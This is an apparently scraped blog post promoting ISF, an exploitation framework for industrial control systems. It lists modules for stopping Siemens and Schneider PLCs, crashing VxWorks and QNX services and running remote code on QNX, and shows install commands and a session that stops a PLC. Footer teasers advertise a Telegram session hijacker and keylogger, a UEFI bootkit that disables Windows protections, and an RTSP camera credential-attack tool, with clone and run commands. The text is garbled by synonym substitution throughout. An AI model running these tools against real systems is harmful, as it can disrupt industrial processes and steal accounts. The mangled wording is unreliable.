Isf - Industrial Command Arrangement Exploitation Framework


ISF(Industrial Exploitation Framework) is a exploitation framework based on Python, it's similar to metasploit framework.

ISF is based on opened upwards source projection routersploit.
Read this inward other languages: English, 简体中文,

ICS Protocol Clients
Name Path Description
modbus_tcp_client icssploit/clients/modbus_tcp_client.py Modbus-TCP Client
wdb2_client icssploit/clients/wdb2_client.py WdbRPC Version two Client(Vxworks 6.x)
s7_client icssploit/clients/s7_client.py s7comm Client(S7 300/400 PLC)

Exploit Module
Name Path Description
s7_300_400_plc_control exploits/plcs/siemens/s7_300_400_plc_control.py S7-300/400 PLC start/stop
s7_1200_plc_control exploits/plcs/siemens/s7_1200_plc_control.py S7-1200 PLC start/stop/reset
vxworks_rpc_dos exploits/plcs/vxworks/vxworks_rpc_dos.py Vxworks RPC remote dos(CVE-2015-7599)
quantum_140_plc_control exploits/plcs/schneider/quantum_140_plc_control.py Schneider Quantum 140 serial PLC start/stop
crash_qnx_inetd_tcp_service exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py QNX Inetd TCP service dos
qconn_remote_exec exploits/plcs/qnx/qconn_remote_exec.py QNX qconn remote code execution
profinet_set_ip exploits/plcs/siemens/profinet_set_ip.py Profinet DCP device IP config

Scanner Module
Name Path Description
profinet_dcp_scan scanners/profinet_dcp_scan.py Profinet DCP scanner
vxworks_6_scan scanners/vxworks_6_scan.py Vxworks 6.x scanner
s7comm_scan scanners/s7comm_scan.py S7comm scanner
enip_scan scanners/enip_scan.py EthernetIP scanner

ICS Protocols Module (Scapy Module)
These protocol tin used inward other Fuzzing framework similar Kitty or exercise your ain client.
Name Path Description
pn_dcp icssploit/protocols/pn_dcp Profinet DCP Protocol
modbus_tcp icssploit/protocols/modbus_tcp Modbus TCP Protocol
wdbrpc2 icssploit/protocols/wdbrpc2 WDB RPC Version two Protocol
s7comm icssploit/protocols/s7comm.py S7comm Protocol

Install

Python requirements

Install on Kali
git clone https://github.com/dark-lbp/isf/ cd isf python isf.py

Usage
    root@kali: /Desktop/temp/isf# python isf.py            _____ _____  _____ _____ _____  _      ____ _____ _______      |_   _/ ____|/ ____/ ____|  __ \| |    / __ \_   _|__   __|        | || |    | (___| (___ | |__) | |   | |  | || |    | |        | || |     \___ \\___ \|  ___/| |   | |  | || |    | |       _| || |____ ____) |___) | |    | |___| |__| || |_   | |      |_____\_____|_____/_____/|_|    |______\____/_____|  |_|                               ICS Exploitation Framework          Note     : ICSSPOLIT is fork from routersploit at                https://github.com/reverse-shell/routersploit     Dev Team : wenzhe zhu(dark-lbp)     Version  : 0.1.0          Exploits: two Scanners: 0 Creds: xiii          ICS Exploits:         PLC: two          ICS Switch: 0         Software: 0             isf >

Exploits
isf > purpose exploits/plcs/ exploits/plcs/siemens/  exploits/plcs/vxworks/ isf > purpose exploits/plcs/siemens/s7_300_400_plc_control exploits/plcs/siemens/s7_300_400_plc_control isf > purpose exploits/plcs/siemens/s7_300_400_plc_control isf (S7-300/400 PLC Control) >
You tin purpose the tab telephone commutation for completion.

Options

Display module options:
isf (S7-300/400 PLC Control) > demonstrate options  Target options:     Name       Current settings     Description    ----       ----------------     -----------    target                          Target address e.g. 192.168.1.1    port       102                  Target Port   Module options:     Name        Current settings     Description    ----        ----------------     -----------    slot        two                    CPU slot number.    command     1                    Command 0:start plc, 1:stop plc.   isf (S7-300/400 PLC Control) >

Set options
isf (S7-300/400 PLC Control) > develop target 192.168.70.210 [+] {'target': '192.168.70.210'}

Run module
isf (S7-300/400 PLC Control) > run [*] Running module... [+] Target is live on [*] Sending parcel to target [*] Stop plc isf (S7-300/400 PLC Control) >

Display information almost exploit
isf (S7-300/400 PLC Control) > demonstrate information  Name: S7-300/400 PLC Control  Description: Use S7comm command to start/stop plc.  Devices: -  Siemens S7-300 together with S7-400 programmable logic controllers (PLCs)  Authors: -  wenzhe zhu <jtrkid[at]gmail.com>  References:  isf (S7-300/400 PLC Control) >

Documents


Popular posts from this blog

Telekiller - A Tool Session Hijacking In Addition To Stealer Local Passcode Telegram Windows

Image
H5N1 Tools Session Hijacking And Stealer Local passcode Telegram Windows. Features : Session Hijacking Stealer Local Passcode Keylogger Shell Bypass ii Step Verification Bypass Av (Coming Soon) Installation Windows git clone https://github.com/ultrasecurity/TeleKiller.git cd TeleKiller pip install -r requirements.txt python TeleKiller.py Dependency : python 2.7 pyHook pywin32 Video Tutorial Operating Systems Tested Windows 10 Windows 8.1 Windows 8 Windows 7 Contact WebSite Ultra Security Team: https://ultrasec.org Channel Telegram: https://t.me/UltraSecurity Thanks to Milad Ranjbar MrQadir Download TeleKiller
Read more

Efiguard - Disable Patchguard Together With Dse At Kicking Time

Image
EfiGuard is a portable x64 UEFI bootkit that patches the Windows kicking manager, kicking loader too center at kicking fourth dimension inward club to disable PatchGuard too Driver Signature Enforcement (DSE). Features Currently supports all EFI-compatible versions of Windows x64 e'er released, from Vista SP1 to Server 2019. Easy to use: tin live on booted from a USB stick via a loader application that automatically finds too boots Windows. The driver tin also live on loaded too configured manually using either the UEFI rhythm out or the loader. Makes extensive utilization of the Zydis disassembler library for fast runtime pedagogy decoding to back upwardly to a greater extent than robust analysis than what is possible amongst signature matching, which oftentimes requires changes amongst novel OS updates. Works passively: the driver does non charge or start the Windows kicking manager. Instead it acts on a charge of bootmgfw.efi yesteryear the firmware kicking ...
Read more

Cameradar V2.1.0 - Hacks Its Mode Into Rtsp Videosurveillance Cameras

Image
   An RTSP flow access tool that comes alongside its library Cameradar allows you lot to Detect opened upward RTSP hosts on whatever accessible target host Detect which device model is streaming Launch automated dictionary attacks to larn their stream route (e.g.: /live.sdp ) Launch automated lexicon attacks to larn the username in addition to password of the cameras Retrieve a consummate in addition to user-friendly study of the results Docker Image for Cameradar Install docker on your machine, in addition to run the next command: docker run -t ullaakut/cameradar -t <target> <other command-line options> See command-line options . e.g.: docker run -t ullaakut/cameradar -t 192.168.100.0/24 -l volition scan the ports 554 in addition to 8554 of hosts on the 192.168.100.0/24 subnetwork in addition to laid on the discovered RTSP streams in addition to volition output debug logs. YOUR_TARGET tin hold out a subnet (e.g.: 172.16.100.0/24 )...
Read more